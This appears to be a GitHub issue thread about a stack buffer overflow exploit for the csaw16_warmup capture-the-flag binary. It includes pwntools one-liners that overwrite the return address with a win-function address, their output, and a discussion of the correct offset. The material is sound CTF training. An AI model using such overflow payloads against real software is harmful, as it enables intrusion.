Exploit for csaw16_warmup not working.
Closed this issue · 3 comments
Hi,
First of all great repo and thanks for putting your time into it.
I have been working on warmup binary and at the end of it I came to the conclusion that :
Our buffer is stored at 0x7fffffffdef0 and to reach rbp it would need $rbp - 0x7fffffffdef0 i.e 0x40 bytes and to reach RIP it would need rbp+8 bytes i.e 0x48 bytes.
But the exploit isn't working for 0x48 i.e 72 bytes and when I tried to debug the binary it worked with0x40bytes + ret address for easy func.
I don't understand why it worked with total 72 bytes and not 72bytes + ret.
Please help me out here.
rudra@0xrudra:~/Desktop/Playground/csaw16_warmup$ python -c "import pwn;print 'A' * 64 + pwn.p64(0x40060d)" | ./warmup
-Warm Up-
WOW:0x40060d
WINWIN
-Warm Up-
WOW:0x40060d
Whereas
rudra@0xrudra:~/Desktop/Playground/csaw16_warmup$ python -c "import pwn;print 'A' * 72 + pwn.p64(0x40060d)" | ./warmup
-Warm Up-
WOW:0x40060d
Segmentation fault (core dumped)
Hello, thank you for the issue. I see what you mean with the offset being 0x40 instead of 0x48. It looks like something to do with different environments the binary is ran in affecting that. Just to be sure I double checked other writeups for the same problem, and the supposed correct offset is 0x48, so it looks like it's an issue with the environment the binary is ran in causing the difference in offset. Thank you and have a nice day!
Also, I pushed a comment for that writeup mentioning this.